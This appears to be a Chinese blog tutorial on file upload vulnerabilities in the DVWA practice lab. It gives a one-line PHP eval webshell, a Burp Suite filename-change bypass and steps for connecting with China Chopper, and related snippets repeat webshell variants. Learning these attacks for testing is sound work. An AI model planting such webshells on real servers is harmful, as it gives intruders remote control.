上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

最新推荐文章于 2025-06-19 23:27:38 发布
原创 最新推荐文章于 2025-06-19 23:27:38 发布 · 4.2k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #运维 #linux

文章介绍了如何通过修改文件扩展名,如将PHP文件改为图片格式,来绕过服务器的上传验证。同时,讨论了一句话木马的概念,以及如何使用中国菜刀工具进行远程管理。通过BurpSuite抓包工具,可以改变文件类型,从而上传并执行PHP代码,实现对服务器的控制。

1、常见漏洞分类

 2、常见验证手段

 

 可抓包后修改扩展名为图片格式,再上传可绕过验证。如:

 

可以修改php文件后缀为其他,再上传。如test.php.xxx

 可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。

 

 客户端验证绕过的方法有:

 例:

 

3、一句话木马

1)木马分为大马、小马和一句话木马:

      小马:文件体积小、上传文件、文件修改、文件管理

      大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)

     一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)

2)中国菜刀工具使用:

百度下载工具——运行caidao.exe

 这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接

新建一个php文档,输入一句话木马:<?php @eval($_POST['x']);?> 保存为10.php。

注意:x为菜刀连接时密码,可修改为其他字符。

再将10.php重命名为10.php.jpeg。(目标网站过滤上传jpeg和png文件)

 打开burp软件,开启捕获。

 再选择10.php.jpeg文件上传

 将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。

brup中关闭捕获。

dvwa中可见上传成功了!

 ../../表示当前路径的上一级、上一级。

复制上传成功后的路径,粘贴到当前浏览器地址的上一级、上一级得到完整路径。

即:http://ip/hackable/uploads/10.php

复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。

再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。

 

 

 

文件上传漏洞以及句话木马
SY_China27的博客
11-01 1399
文件上传是web系统中常见的种功能,通过文件能上传各种类型的文件,这其中随着web包含的功能越来越多,也变得越来越大恶意用户上传了,就会导致网站被其控制,甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
文件上传漏洞------句话木马原理解析
m0_69151365的博客
03-11 3823
这是个最简单的句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
文件上传句话木马getshell
qq_41620273的博客
12-25 6081
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 句话木马: 1.在phpstudy搭建的站点www目录下写入php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
文件上传漏洞句话木马
最新发布
meiqianchifanle的博客
06-19 554
Webshell 是种恶意脚本或程序,通常以网页文件(如.php.jsp.asp.aspx等)的形式存在。它被攻击者上传或植入到目标 Web 服务器的网站目录中,目的是在服务器上建立个,从而实现对服务器的远程控制。
DVWA-文件上传全等级绕过(句话木马+中国菜+蚁剑)
热门推荐
12-13 1万+
DVWA文件上传前言、low级别1.1 句话木马1.2 中国菜使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
dvwa中的文件上传漏洞
无痕的博客
01-12 1万+
dvwa漏洞环境演示文件上传漏洞
DVWA 文件上传漏洞
QYbkx974的博客
11-16 1709
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4764
DVWA文件上传
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 2432
当然了,代码还有很多种写法,这只是比较简单的种,些特殊情况下还要使用别的写法。
DVWA--文件上传漏洞
xiaoxiao的博客
11-28 1675
文件上传漏洞定义 文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。 文件上传漏洞的前提 能上传木马 上传木马可执行 还要清楚上传后的路径 实现过程 LOW级别 源码 basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文...
句话木马原理介绍和中国菜原理的介绍
Firebasky的博客
06-07 7337
,c,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究句话木马和菜的原理。 下面的原理是自己看其他大佬写的和自己总结的些介绍。 希望能够帮助老表们~~~ 句话木马原理 我这里就分析PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看下经典的句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
WEB安全--文件上传漏洞--句话木马的工作方式
m0_74800552的博客
03-31 709
然后用eval(base64_decode())的方式把它解码,这里嵌套的目的是用eval()执行base64_decode()然后网站中的句话木马中的$_POST['oupe]接到这个变量,也就是接到这些代码,第二个字段则是先用 $_POST('e002eeda8c12f5') 接到这段编码。也就是说最后蚁剑将处理后的值赋给oupeng这个变量,1:e002eeda8c12f5=[省略]于是我们就能用oupeng接到解码后的代码。最后再利用eval()在网站中执行这些代码。
文件上传句话木马,用菜进行连接
XY011009的博客
12-02 9579
工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传些恶意文件,有些用户利用这个漏洞上传句话木马(webshell),上传成功后就可以利用中国菜工具来进行对这个网站后步的攻击。 1.无任何上传限制 这里可以直接上传句话木马然后用菜工具进行连接 2.限制了文件类型 有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看...
Web安全威胁:文件上传漏洞句话木马详解
tengyuehou的博客
04-06 1183
文件上传漏洞是发生在有上传功能的应用中,如果应用程序对用户的上传文件没有控制或者存在缺陷,攻击者可以利用应用上传功能存在的缺陷,上传木马、病毒等有危害的文件到服务器上面,控制服务器。文件上传漏洞产生的主要原因是:应用中存在上传功能,但是上传的文件没有经过严格的合法性检验或者检验函数存在缺陷,导致可以上传木马文件到服务器文件上传漏洞危害极大是因为可以直接上传恶意代码到服务器上,可能会造成服务器的网页篡改、网站被挂马、服务器被远程控制、被安装后门等严重的后果。
Web木马文件上传漏洞
weixin_62707591的博客
06-20 4088
目录 、认识Web木马 1.1 木马概念 1.2 web木马危害 1.2.1 攻击者留后门 1.2.2 文件、数据库操作 1.2.3 修改web页面 1.3 Web 木马特点 1.3.1Web木马可大可小 1.3.2 无法有效隐藏 1.3.3 具有明显特征值 1.3.4 必须为可执行的网页格式: 1.4 Web木马分类 1.4.1 句话木马 1.4.2 大马小马 二、初识文件上传漏洞 2.1 文件上传漏洞的概念 2.2 文件上传漏洞的危害 2.2.1 非授权用户的越
文件上传漏洞
WYJ____的博客
08-06 859
预备知识 【BurpSuite】的基本使用 客户端javascript检测的原理 【中国菜】的基本使用 实验目的 绕过JavaScript验证检测,上传句话木马。 实验工具 BurpSuite、中国菜句话木马 实验环境 服务器台(Windows Server 2003)客户机台(windows Server 2003) 实验步骤 第步:打开下方网页,上传事先准...
中国菜上传句话木马,巴西烤肉提权
qiu_zhang_的博客
04-26 2706
如何使用中国菜上传句话木马呢,今天我来教大家 首先在你的电脑上创建个文本文件,内容写上句话木马,可以是asp,也可以是PHP,注意更改value值。但是最后文件名后缀要改成.jpg。格式可以如图所示 在搭建好的网站中上传.jpg文件,会看到,上传以后的文件路径发生了改变,复制好这个文件路径。 打开中国菜,空白处右击,添加,将你的网址和你刚刚复制的文件路径粘贴上去。注意下图,在地址右侧小...
dvwa文件包含漏洞句话木马
01-02
### DVWA 中的句话木马利用方法 在DVWA环境中,文件包含漏洞可以被攻击者用来执行恶意代码。当涉及到句话木马时,通常是指段非常简洁的PHP代码,它能够接收来自远程客户端的指令并执行相应的命令。 对于DVWA中的文件上传功能,如果存在安全漏洞,则允许攻击者上传特制文件(如带有隐藏PHP代码的图像),并通过访问该文件来触发服务器端执行恶意脚本[^1]。 #### 利用过程 为了成功利用漏洞: - 攻击者会准备个看似正常的图片文件,在其中嵌入了行简单的PHP代码作为webshell。 ```php <?php @eval($_POST['cmd']);?> ``` - 使用Burp Suite这样的工具拦截HTTP请求,并修改MIME类型或其他参数以绕过某些基本的安全检测机制[^4]。 - 成功上传后,通过浏览器或者其他方式向这个已上传到服务器上的特殊文件发送特定格式的数据包,从而实现远程控制目标主机的目的。 然而需要注意的是,在实际测试过程中可能会遇到各种原因导致上述操作无法顺利完成,比如因为fwrite函数后面指针名称错误等问题而使得整个流程失败[^3]。 ### 防护措施建议 针对此类风险,可以从以下几个方面加强系统的安全性: - **输入验证**:严格检查所有用户提交的内容,特别是文件上传部分,确保只接受预期类型的文件,并对文件头进行校验防止伪装成其他形式的可执行代码混入系统内部。 - **权限管理**:合理设置Web应用程序及其工作目录下的读写权限,避免不必要的开放;同时也要注意操作系统层面的安全策略调整,减少潜在威胁面。 - **禁用危险函数**:可以在`php.ini`配置文件中关闭些容易引发安全隐患的功能调用,像这里的`eval()`就是个典型例子[^2]。 - **定期更新补丁**:保持所使用的软件版本处于最新状态,及时安装官方发布的修复程序,以此封堵可能存在的未知漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值